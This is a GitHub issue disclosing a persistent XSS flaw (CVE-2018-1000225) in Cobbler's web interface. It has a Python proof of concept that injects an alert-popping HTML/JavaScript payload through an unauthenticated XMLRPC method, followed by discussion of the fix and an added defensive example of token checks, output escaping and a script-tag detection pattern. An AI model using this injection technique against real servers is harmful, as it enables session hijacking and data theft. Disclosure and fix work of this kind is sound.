
Persistent XSS vulnerability in cobbler-web [CVE-2018-1000225] #1917

Closed
movermeyer opened this issue Aug 2, 2018 · 3 comments
Labels
Bug Report Reporting a bug Priority Issues that will be worked on with higher priority. Security Web-interface Should not be used anymore. We have a dedicated cobbler-web project for this
Comments

@movermeyer
Contributor

cobbler-web renders HTML and executes JavaScript payloads that are provided by users.
Combined with authentication problems in the Cobbler XMLRPC API, this allows unauthenticated users to inject malicious payloads into the web UI.

A harmless Proof of Concept script:

```python
import xmlrpc.client

# Connect to the Cobbler XMLRPC API on the local host.
cobbler_connection = xmlrpc.client.ServerProxy("http://127.0.0.1/cobbler_api", allow_none=True)

# Harmless payload: cobbler-web renders the button and runs the script as-is.
payload = """
<button onclick="myFunction()">Click me!</button>

<script>
function myFunction() {
    alert("Hah! you clicked!");
}
</script>
"""

# The private _new_event method accepted this without any auth token.
cobbler_connection._new_event(payload)
```

Then when you visit the cobbler_web/events endpoint:

[Screenshot: cobbler_js_event]

These payloads can be used to hijack administrator sessions and perform actions that the attacker would otherwise be unable to, or to exfiltrate sensitive information.

cobbler-web should sanitize all user-provided inputs and treat them as untrusted. This includes never rendering user-provided HTML, nor executing user-provided JavaScript.

See this post for more discussion.

@movermeyer movermeyer changed the title Persistent XSS vulnerability in cobbler-web Persistent XSS vulnerability in cobbler-web [CVE-2018-1000225] Aug 21, 2018
@meaksh
Member

meaksh commented Dec 13, 2018

I think this issue could now be considered as fixed since the private _ methods from the XMLRPC API are not exposed anymore. Also modify_settings now requires an auth token, so IIUC the issue described here is no longer happening.
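The two defences discussed in this thread, an auth-token check on the XMLRPC write path (meaksh's comment) and escaping of user-provided text before it is rendered (the report's recommendation), as an added example that is not Cobbler's own code. The `EventStore` class, its `login` credentials and `render_events` are hypothetical stand-ins for the events table and the `cobbler_web/events` view; the sample payload is the one from the proof of concept above.

```python
import hmac
import html
import re
import secrets

# Constructed sample: the payload from the proof of concept in this issue.
SAMPLE_PAYLOAD = """
<button onclick="myFunction()">Click me!</button>

<script>
function myFunction() {
    alert("Hah! you clicked!");
}
</script>
"""


class EventStore:
    """Hypothetical stand-in for the events table behind cobbler_web/events.

    Writes require a valid auth token; reads escape every entry before it
    reaches the page. Neither the class nor the credentials are Cobbler's.
    """

    def __init__(self):
        self._events = []
        self._tokens = set()

    def login(self, user, password):
        # Hypothetical credential check; real Cobbler delegates to its authn modules.
        if user == "cobbler" and password == "correct-horse":
            token = secrets.token_hex(16)
            self._tokens.add(token)
            return token
        raise PermissionError("bad credentials")

    def _check_token(self, token):
        # Constant-time comparison so token prefixes cannot be guessed via timing.
        candidate = str(token).encode()
        if not any(hmac.compare_digest(candidate, t.encode()) for t in self._tokens):
            raise PermissionError("missing or invalid auth token")

    def new_event(self, text, token=None):
        # Unauthenticated callers are rejected before anything is stored.
        if token is None:
            raise PermissionError("missing or invalid auth token")
        self._check_token(token)
        # Stored verbatim: escaping happens at output time, so the log stays searchable.
        self._events.append(text)
        return len(self._events) - 1


def render_events(store):
    """Render the event list as an HTML <ul>; every entry is escaped, quotes included."""
    rows = "".join(f"<li>{html.escape(e, quote=True)}</li>" for e in store._events)
    return f"<ul>{rows}</ul>"


_DANGEROUS_TAG_RE = re.compile(r"<\s*/?\s*(script|button|img|svg|iframe)\b", re.IGNORECASE)


def contains_markup(rendered):
    """True if a user-controllable tag survived as real markup (i.e. escaping failed)."""
    return _DANGEROUS_TAG_RE.search(rendered) is not None


def demo():
    """Replay the report against both defences; returns (write_rejected, rendered_page)."""
    store = EventStore()
    rejected = False
    try:
        store.new_event(SAMPLE_PAYLOAD)  # no token: must be refused
    except PermissionError:
        rejected = True
    token = store.login("cobbler", "correct-horse")
    store.new_event(SAMPLE_PAYLOAD, token=token)  # authenticated write is allowed
    return rejected, render_events(store)


if __name__ == "__main__":
    rejected, page = demo()
    print("unauthenticated write rejected:", rejected)
    print("rendered page:", page)
    print("live markup present:", contains_markup(page))
```

Escaping at output rather than at storage is deliberate: the event text can still be searched and exported as the user entered it, while every rendering path goes through one escaping function. If cobbler-web's templates are rendered with Django, the same effect is what its autoescape setting provides as long as no template marks user text as safe.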

@opoplawski
Contributor

If this is fixed can we please close this. Also, if this is fixed, what version was it fixed in?

@SchoolGuy SchoolGuy added Bug Report Reporting a bug Priority Issues that will be worked on with higher priority. Web-interface Should not be used anymore. We have a dedicated cobbler-web project for this Security labels Jun 18, 2019
@SchoolGuy SchoolGuy added this to Inbox in Backlog Aug 15, 2019
@SchoolGuy SchoolGuy moved this from Inbox to Bug Reports in Backlog Oct 17, 2019
@SchoolGuy SchoolGuy moved this from Bug Reports to To do in Backlog Oct 24, 2019
@SchoolGuy
Member

Backlog automation moved this from To do to Done Jan 24, 2020